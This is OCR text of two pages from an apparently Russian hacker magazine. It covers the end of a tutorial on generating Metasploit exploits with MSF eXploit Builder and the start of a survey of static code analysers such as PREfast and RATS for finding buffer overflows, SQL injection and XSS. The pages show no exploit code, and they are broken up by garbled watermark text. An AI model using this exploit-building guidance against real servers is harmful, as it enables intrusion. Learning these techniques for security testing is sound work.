Operation = RAW. Ядовитый пакет готов. Собственно, теперь у нас есть все для создания готового сплоита. Поэтому нажимаем на кнопку «Generate» и любуемся кодом получившегося сплоита. Если какие-то моменты вызывают сомнения, тут же можно отредактировать код вручную. Классно, что возможно сразу проверить работоспособность кода — для этого смело жмем кнопку «Test». И ведь — все работает! За 5 минут, которые ушли на ознакомление с программой, и без всякого знания, как языка Ruby, так и структуры Metasploit, мы создали полностью рабочий сплоит. Это дорогого стоит! В качестве домашнего задания попробуй с помощью MSF eXploit Builder создать эксплоит для нашего сервера :).

ЗАКЛЮЧЕНИЕ

Вот и закончилась наша экскурсия по фабрике эксплоитов. Знать, как устроены сплоиты, полезно во многих отношениях. Не умея прочитать шелл-код в свежем эксплоите или, вообще, запуская непонятный exe'шник, далеко не всегда можно доверять его создателю. Многие сплоиты выпускаются в паблик с отсутствующими частями и специально оставленными ошибками — это непременно остановит армию скрипткидис, но для понимающего человека едва ли станет серьезной задачей. Надеюсь, я сегодня убедил тебя, что ничего нереального в сплоитах нет: ведь хакеры люди — логичные и понятные :). z

037

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

СТЕПАН «STEP» ИЛЬИН TWITЕR.COM/STEPAH

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

12 TOOLS

ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕНТЕСТЕРА СТАТИЧЕСКИЙ АНАЛИЗ КОДА

У каждого из команды z — свои предпочтения по части софта и утилит для пентеста. Посовещавшись, мы выяснили: выбор так разнится, что можно составить настоящий джентльменский набор из проверенных программ. На том и решили. Чтобы не делать сборную солянку, весь список разбит на темы. Сегодня мы разберем статические анализаторы кода для поиска уязвимостей в приложениях, когда на руках — их исходники.

Наличие исходных кодов программы существенно упрощает поиск уязвимостей. Вместо того чтобы вслепую манипулировать различными параметрами, которые передаются приложению, куда проще посмотреть в сорцах, каким образом она их обрабатывает. Скажем, если данные от пользователя передаются без проверок и преобразований, доходят до SQL-запроса — имеем уязвимость типа SQL injection. Если они добираются до вывода в HTML-код — получаем классический XSS. От статического сканера требуется четко обнаруживать такие ситуации, но, к сожалению, выполнить это не всегда так просто, как кажется.

Современные

компиляторы

Может показаться забавным, но одним из самых эффективных анализаторов кода являются сами компиляторы. Конечно, предназначены они совсем для другого, но в качестве бонуса каждый из них предлагает неплохой верификатор исходников, способный обнаружить большое количество ошибок. Почему же он не спасает? Изначально настройки такой верификации кода выставлены достаточно лояльно: в результате, чтобы не смущать программиста, компилятор начинает ругаться только в случае самых серьезных косяков. А вот и зря — если поставить уровень предупреждений повыше, вполне реально откопать немало сомнительных мест в коде. Выглядит это примерно следующим образом. Скажем, в коде отсутствует проверка на длину строки перед копированием ее в буфер. Сканер находит функцию, копирующую строку (или ее фрагмент) в буфер фиксированного размера без предварительной про-

PREFAST — КОГДА-ТООТДЕЛЬНОЕ ПРИЛОЖЕНИЕ, АТЕПЕРЬЧАСТЬ

VISUAL STUDIO

верки ее длины. Он прослеживает траекторию передачи аргументов: от входных данных до уязвимой функции и смотрит: возможно ли подобрать такую длину строки, которая бы вызывала переполнение в уязвимой функции и не отсекалась бы предшествующими ей проверками. В случае если такой проверки нет, находим практически 100% переполнение буфера. Главная сложность в использовании для проверки компилятора — заставить его «проглотить» чужой код. Если ты хоть раз пытался скомпилировать приложение из исходников, то знаешь, насколько сложно удовлетворить все зависимости, особенно в больших проектах. Но результат стоит того! Тем более, помимо компилятора

вмощные IDE встроены и некоторые другие средства для анализа кода. К примеру, на следующий участок кода в Visual Studio будет выдано предупреждение об использовании

вцикле функции _alloca, что может быстро переполнить стек:

char *b; do {

b = (char*)_alloca(9) } while(1)

РЕЗУЛЬТАТСКАНИРОВАНИЯRATS

В этом заслуга статического анализатора PREfast. Подобно FxCop, предназначенной для анализа управляемого кода, PREfast изначально распространялся в виде отдельной утилиты и лишь позже стал частью Visual Studio.

RATS — Rough Auditing Tool for Security www.securesoftware.com GNU GPL

Unix, Windows

Ошибка ошибке — рознь. Часть огрех, которые допускают программисты, некритична и грозит только нестабильностью программы. Другие, напротив, позволяют инжектировать шелл-код и выполнять произвольные команды на удаленном сервере. Особый риск в коде представляют команды, позволяющие выполнить buffer overflow и другие похожие типы атак. Таких команд очень много, в случае с C/C++ это функции для работы со строками (xstrcpy(), strcat(), gets(), sprintf(), printf(), snprintf(), syslog()), системные

038	XÀÊÅÐ 11 /131/ 09

<<< < Предыдущая 1 2 34 / 154 5 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf
#
20.04.202415.43 Mб12135_Optimized.pdf
#
20.04.202416.32 Mб12136_Optimized.pdf